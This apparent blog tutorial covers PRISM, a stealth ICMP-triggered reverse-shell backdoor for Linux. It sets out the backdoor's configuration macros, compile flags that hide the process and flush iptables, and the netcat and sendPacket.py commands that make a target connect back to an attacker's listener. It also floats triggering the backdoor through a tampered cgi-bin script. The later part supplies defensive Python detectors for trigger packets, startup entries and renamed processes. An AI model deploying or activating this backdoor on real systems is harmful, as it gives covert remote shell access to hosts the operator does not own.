ICMP bounce backdoor under Linux: PRISM

Source: Internet
Author: User

I stumbled across this ping-based ICMP backdoor while searching, so I went to the author's GitHub to have a look. It is all in English, which at my level I could only grit my teeth and read through; this poor student suffered. Fortunately it is fairly easy to understand. As the introduction says: "PRISM is a user space stealth reverse shell backdoor, written in pure C."

Project address: https://github.com/andreafabrizi/prism

Prism has only two main files and a simple configuration, and it runs on Linux, Solaris, AIX, BSD/Mac, Android and many other systems. Two modes of operation are supported: ICMP and STATIC.




~$ nc -l -p 9999


./sendPacket.py <target host IP> linger <master IP> 9999
# arguments, in order: IP address of the remote (target) host; connection password (linger); IP address of the master; port the master is listening on (9999)



Of course, as a minimal backdoor Trojan it also has a number of advantages:

Neither mode of operation needs any library support; the process renames itself at runtime; there are no listening ports; it can flush the iptables rules automatically; and it is written in C (only about 200 lines of code).

Configuring the Prism Backdoor

Edit the prism.c file and modify the macro definitions:

#ifdef STATIC
#define REVERSE_HOST     ""          // IP address of the master machine to connect back to
#define REVERSE_PORT     19832       // port on the master to connect to
#define RESPAWN_DELAY                // idle interval between reconnection attempts (value not shown on the page)
#else
#define ICMP_PACKET_SIZE 1024        // size of the ICMP packet
#define ICMP_KEY         "linger"    // connection password
#endif
#define VERSION          "0.5"       // version information
#define MOTD             "PRISM v" VERSION " started\n\n#"   // message displayed when the backdoor connects
#define SHELL            "/bin/sh"   // shell to execute
#define PROCESS_NAME     "udevd"     // name the process is renamed to

Cross-compiling Prism backdoor

gcc <OPTIONS> -Wall -s -o prism prism.c

Available <OPTIONS>:

-DDETACH    // run in the background
-DSTATIC    // static mode only (the default is ICMP mode)
-DNORENAME  // do not rename the process
-DIPTABLES  // flush all iptables rules

For example:

gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

Cross-compiling for different platforms requires the relevant library files:

Android Platform:


Linux 64bit:

apt-get install libc6-dev-amd64
gcc -DDETACH -m64 -Wall -s -o prism prism.c

Linux 32bit:

apt-get install libc6-dev-i386
gcc -DDETACH -m32 -Wall -s -o prism prism.c

After compiling, you can view the backdoor's configuration information:

Running the prism backdoor test

Upload the backdoor to the remote host, then use the sendPacket.py script locally (it must be run as root) to send the activation packet to the backdoor host, and listen locally on the relevant port, waiting for the backdoor host to connect back. (Note: it is best to upload prism.c to the backdoor host and compile it there; that makes success more likely.)
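The network side of this activation step is what a defender can watch for. As an added example (not code from the original post or from the PRISM project), the Python below parses raw IPv4/ICMP bytes and flags echo requests that do not look like ordinary ping traffic: a payload far larger than a default ping's 56 data bytes (the configuration above sets ICMP_PACKET_SIZE to 1024), or free text where iputils ping carries a timestamp followed by counting bytes. The size threshold, the text-run length, the allowlisted ping patterns and the two sample packets are assumptions constructed for the example; the default key "linger" is used only as a secondary indicator, since a deployment can compile in a different one.

```python
"""Flag ICMP echo requests that do not look like ordinary ping traffic.

Added example, not code from the original post or the PRISM project. It parses
raw IPv4/ICMP bytes and applies structural checks rather than relying on a
fixed key. Thresholds and the allowlisted ping patterns are assumptions.
"""
import string
import struct

PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
MAX_NORMAL_ECHO_DATA = 256      # assumption: default Linux ping carries 56 data bytes
MIN_TEXT_RUN = 12               # assumption: tunable per environment
KNOWN_KEYS = (b"linger",)       # default ICMP_KEY from the config section; may be changed


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (used to build samples)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(data: bytes, ident: int = 0x1234, seq: int = 1) -> bytes:
    """Constructed sample packet: minimal IPv4 header (IP checksum left 0) + ICMP echo."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + data
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return ip + icmp


def parse_ipv4_icmp(pkt: bytes):
    """Return (icmp_type, echo_data) for an IPv4 packet carrying ICMP, else None."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 1 or len(pkt) < ihl + 8:       # protocol 1 = ICMP
        return None
    icmp = pkt[ihl:]
    return icmp[0], icmp[8:]


def is_known_ping_pattern(data: bytes) -> bool:
    """Linux iputils: 8-byte timestamp then bytes 0x10, 0x11, ...; Windows: the
    alphabet 'abcdefghijklmnopqrstuvw' repeated. Both are assumptions about
    typical clients and can be extended."""
    n = len(data)
    if data[8:] == bytes((0x10 + i) & 0xFF for i in range(max(n - 8, 0))):
        return True
    alphabet = b"abcdefghijklmnopqrstuvw"
    return data == (alphabet * (n // len(alphabet) + 1))[:n]


def longest_printable_run(data: bytes) -> int:
    best = cur = 0
    for b in data:
        cur = cur + 1 if b in PRINTABLE else 0
        best = max(best, cur)
    return best


def classify_echo(pkt: bytes) -> list:
    """Return the reasons an echo request looks like a trigger; [] if it looks normal."""
    parsed = parse_ipv4_icmp(pkt)
    if parsed is None or parsed[0] != 8:         # 8 = echo request
        return []
    data = parsed[1]
    reasons = []
    if len(data) > MAX_NORMAL_ECHO_DATA:
        reasons.append("oversized echo payload (%d bytes)" % len(data))
    if not is_known_ping_pattern(data) and longest_printable_run(data) >= MIN_TEXT_RUN:
        reasons.append("free text in echo payload where a ping pattern is expected")
    for key in KNOWN_KEYS:
        if key in data:
            reasons.append("known trigger key %r present" % key.decode())
    return reasons


# constructed samples: a default Linux ping and a 1024-byte text-carrying echo
NORMAL_PING = build_echo_request(b"\x00" * 8 + bytes(0x10 + i for i in range(48)))
SUSPECT = build_echo_request(b"linger hello-from-constructed-sample".ljust(1024, b"\x00"))

if __name__ == "__main__":
    for label, pkt in (("normal", NORMAL_PING), ("suspect", SUSPECT)):
        print(label, classify_echo(pkt) or "looks like ordinary ping")
```

The two structural checks are the ones worth keeping in production, because the key is compiled into the binary and will not be "linger" on a real compromise; feed the classifier the raw bytes of each packet from a capture and alert on anything that returns a non-empty list.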



First, as noted above, this backdoor stops working after a reboot unless it is written into a startup item. An attacker who wants to keep the backdoor will certainly do that, so the first thing to check is whether the boot items (for example /etc/rc.local, which runs as root!) contain any unknown startup scripts. Thinking back to the recent Bash vulnerability, one neat idea is to alter some script in cgi-bin so that accessing that script triggers the prism backdoor, which removes the need for the earlier python script. Er, this seems to have turned into attacking -_- Anyway, one should at least be aware of it. Who knows, someone might actually use it this way.
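A way to carry out the startup-item check mentioned above, as an added example (not code from the original post or from the PRISM project): the Python below tokenizes a simple shell script such as /etc/rc.local, pulls out the program each line launches (skipping nohup/sudo/env wrappers, variable assignments and redirections) and reports anything run from a writable directory, via a relative path, or absent from a baseline. The baseline set, the directory list and the sample script are assumptions constructed for the example; a real baseline should be taken from a known-good copy of the host.

```python
"""Audit a startup script (e.g. /etc/rc.local) for entries that launch unknown binaries.

Added example, not code from the original post or the PRISM project. The baseline,
the writable-directory list and the sample script are assumptions.
"""
import os
import re
import shlex

BASELINE = {"echo", "hwclock", "sysctl", "cd", "exit", "true"}   # assumption: from a known-good copy
WRAPPERS = {"nohup", "sudo", "env", "exec", "setsid", "nice"}
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")
SEPARATORS = set("&|;()")
ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def split_commands(line):
    """Split one shell line into argv lists, dropping redirections and the
    separators '&&', '||', ';', '&', '|' and parentheses. Comments are handled
    by shlex ('#' outside quotes)."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, argv, skip_next = [], [], False
    for tok in lex:
        if not tok:
            continue
        if skip_next:                       # the target of a redirection
            skip_next = False
            continue
        if "<" in tok or ">" in tok:        # '>', '>>', '2>&1' ... swallow the next token
            skip_next = True
        elif set(tok) <= SEPARATORS:        # end of the current command
            if argv:
                commands.append(argv)
            argv = []
        else:
            argv.append(tok)
    if argv:
        commands.append(argv)
    return commands


def command_word(argv):
    """Strip wrapper commands, their flags and VAR=value assignments; return the program."""
    for tok in argv:
        if tok in WRAPPERS or tok.startswith("-") or ASSIGN.match(tok):
            continue
        return tok
    return None


def audit_startup_script(text):
    """Return (lineno, command, reason) for every command that deserves a look."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for argv in split_commands(line):
            cmd = command_word(argv)
            if cmd is None:
                continue
            if cmd.startswith(SUSPICIOUS_DIRS):
                findings.append((n, cmd, "launched from a user- or world-writable directory"))
            elif "/" in cmd and not cmd.startswith("/"):
                findings.append((n, cmd, "relative path; depends on the working directory"))
            elif os.path.basename(cmd) not in BASELINE:
                findings.append((n, cmd, "not in the baseline of expected commands"))
    return findings


# constructed sample of an rc.local file, not taken from any real host
SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
# constructed sample, see above
echo "boot" > /var/log/boot-marker
/usr/sbin/hwclock --hctosys
nohup /tmp/.x/prism >/dev/null 2>&1 &
cd /var/tmp && ./udevd ; sysctl -p
exit 0
"""

if __name__ == "__main__":
    for lineno, cmd, reason in audit_startup_script(SAMPLE_RC_LOCAL):
        print("line %d: %s: %s" % (lineno, cmd, reason))
```

Run it over the real file with `audit_startup_script(open("/etc/rc.local").read())`, and apply the same check to the other places a root-level startup hook can hide (init scripts, systemd units, cron); the tokenizer is deliberately simple and will not follow sourced files or command substitutions, which should be flagged by hand.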




But, looking at it from the attacker's point of view, the prism backdoor is still fairly hard to defend against. As its author describes it: "No listening ports". What does that mean? It means you can connect using whatever port you like; er, I tested it : ) That being so, the point two items above seems to be invalidated -_-
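Since there is no listening socket to find, a host-side check has to start from the process list instead. As an added example (not code from the original post or from the PRISM project), the Python below compares each process's displayed name with the file behind /proc/<pid>/exe, which a renamed process cannot change: a process calling itself udevd (the default PROCESS_NAME above) but backed by a binary in /tmp stands out immediately. The expected paths for the genuine udev daemon, the writable-directory list and the sample process entries are assumptions constructed for the example.

```python
"""Find processes whose displayed name does not match the binary behind them.

Added example, not code from the original post or the PRISM project. The
expected-path table assumes a common Debian/Ubuntu layout; adapt it per host.
"""
import os

# assumption: where the genuine udev daemon lives on typical distributions
EXPECTED_EXE = {
    "udevd": ("/lib/systemd/systemd-udevd", "/usr/lib/systemd/systemd-udevd", "/sbin/udevd"),
    "systemd-udevd": ("/lib/systemd/systemd-udevd", "/usr/lib/systemd/systemd-udevd"),
}
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")


def audit_process(pid, name, exe):
    """Return (pid, name, exe, reason) if the process deserves a look, else None."""
    if exe.endswith(" (deleted)"):
        return (pid, name, exe, "backing file removed from disk")
    if name in EXPECTED_EXE and exe not in EXPECTED_EXE[name]:
        return (pid, name, exe, "name belongs to a system daemon but the binary differs")
    if exe.startswith(SUSPICIOUS_DIRS):
        return (pid, name, exe, "binary runs from a user- or world-writable directory")
    return None


def audit_all(entries):
    """Apply audit_process to (pid, name, exe) triples and keep the findings."""
    return [r for r in (audit_process(*e) for e in entries) if r is not None]


def collect_live():
    """Read (pid, name, exe) from /proc on the current host. The name is the
    basename of argv[0] (what ps shows), falling back to comm. Reading exe of
    other users' processes needs root; unreadable entries are skipped."""
    entries = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open("/proc/%d/cmdline" % pid, "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode(errors="replace")
            with open("/proc/%d/comm" % pid) as f:
                comm = f.read().strip()
            exe = os.readlink("/proc/%d/exe" % pid)
        except OSError:
            continue
        entries.append((pid, os.path.basename(argv0) or comm, exe))
    return entries


# constructed sample of (pid, name, exe) triples, not from a real host
SAMPLE_PROCESSES = [
    (412, "systemd-udevd", "/lib/systemd/systemd-udevd"),
    (1337, "udevd", "/tmp/.cache/prism"),
    (1402, "bash", "/usr/bin/bash"),
    (2001, "nginx", "/usr/sbin/nginx (deleted)"),
    (3110, "sh", "/dev/shm/.s"),
]

if __name__ == "__main__":
    for finding in audit_all(SAMPLE_PROCESSES):
        print("pid %d %-14s %-32s %s" % finding)
```

On a live system call `audit_all(collect_live())` as root. A "(deleted)" backing file is not proof of anything by itself (a daemon kept running across a package upgrade looks the same), so treat that reason as a prompt to compare the running image with what the package manager installed rather than as an alert on its own.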

